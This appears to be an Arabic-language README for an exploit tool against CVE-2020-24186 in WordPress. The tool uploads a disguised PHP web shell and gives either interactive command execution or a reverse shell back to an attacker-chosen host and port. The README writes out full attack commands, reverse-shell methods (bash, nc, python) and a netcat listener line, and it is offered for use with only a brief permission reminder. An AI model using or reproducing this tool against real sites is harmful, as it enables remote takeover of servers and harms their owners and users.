
نص استغلال لـ CVE-2020-24186 في ووردبريس يقوم برفع غلاف ويب PHP مموه ويوفر وصولاً تفاعليًا أو شل عكسي مع أتمتة مستمع pwntools اختيارية.
يستغل هذا السكريبت الثغرة CVE-2020-24186 في ووردبريس لرفع حمولة PHP مقنعة والحصول على شل على النظام المستهدف. هناك ثلاثة أوضاع تشغيل:
شل تفاعلي:
يقوم برفع الويب شل الأساسي ويدخل في وضع تفاعلي يسمح لك بإرسال الأوامر عبر باراميتر cmd.
شل عكسي يدوي:
يقوم برفع الويب شل وإرسال حمولة الشل العكسي، لكنه لا يقوم بتشغيل مستمع تلقائياً. يجب عليك بدء المستمع الخاص بك يدوياً على عنوان IP والمنفذ المحددين.
شل عكسي باستخدام pwntools:
يقوم برفع الويب شل وإرسال حمولة الشل العكسي، ويقوم السكريبت تلقائياً بتشغيل مستمع باستخدام pwntools لالتقاط الاتصال العكسي.
requestspwn (pwntools)--url: عنوان URL الأساسي للموقع المستهدف (مثل http://10.10.110.119).--blogpath: مسار المنشور (الافتراضي: /?page=1).--mode: وضع التشغيل، إما interactive أو reverse.--lhost: عنوان IP المحلي للشل العكسي (مطلوب في الوضع العكسي).--lport: المنفذ المحلي للشل العكسي (مطلوب في الوضع العكسي).--reverse_method: طريقة الشل العكسي: bash أو nc أو python (الافتراضي هو bash).--manual: عند استخدامه في الوضع العكسي، لن يقوم السكريبت بتشغيل المستمع؛ يجب أن تبدأ المستمع الخاص بك يدوياً.--use-proxy: إذا تم تعيينه، سيتم إرسال الطلبات عبر البروكسي المُهيأ.قم برفع ويب شل وابدأ جلسة تفاعلية لإرسال الأوامر:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
قم برفع ويب شل، وأرسل حمولة الشل العكسي، لكن لا تبدأ المستمع تلقائياً. ابدأ المستمع الخاص بك يدوياً (على سبيل المثال، باستخدام netcat):
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
ثم، في طرفية أخرى، ابدأ المستمع الخاص بك يدوياً:
nc -lvnp 9002
قم برفع ويب شل، وأرسل حمولة الشل العكسي، واجعل السكريبت يقوم تلقائياً بتشغيل مستمع باستخدام pwntools لالتقاط الاتصال:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
سينتظر السكريبت اتصالاً على 10.10.1.1:9002، وبمجرد الاتصال، سيوفر شلاً تفاعلياً.
ملاحظات
تأكد من أن الموقع المستهدف معرض للثغرة CVE-2020-24186 وأن لديك الأذونات اللازمة لاختبار الأمان.
يمكنك تعديل حمولة PHP باستخدام الخيار --php_payload إذا كانت هناك حاجة للتعديلات.
تحقق جيداً من إعدادات البروكسي إذا استخدمت العلم --use-proxy.